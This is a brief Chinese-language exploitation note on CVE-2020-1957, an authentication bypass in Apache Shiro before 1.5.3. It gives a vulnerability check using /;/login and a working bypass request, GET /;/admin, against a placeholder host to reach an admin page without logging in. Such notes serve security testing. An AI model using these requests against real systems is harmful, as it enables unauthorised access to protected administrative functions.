【笔记】CVE-2020-1957漏洞利用
前言
Java的Shiro框架未授权访问漏洞利用
漏洞利用前提
- Apache Shiro < 1.5.3
poc
- 如果能正常访问
/login
,则可以通过/;/login
测试是否依然可以显示 - 如果可以正常显示,说明存在漏洞;如果显示报错页面,说明不存在漏洞
1 | GET http://example.com/;/login |
漏洞利用
- 通过
/;/admin
绕过Shiro直接进入管理员页面
1 | GET http://example.com/;/admin |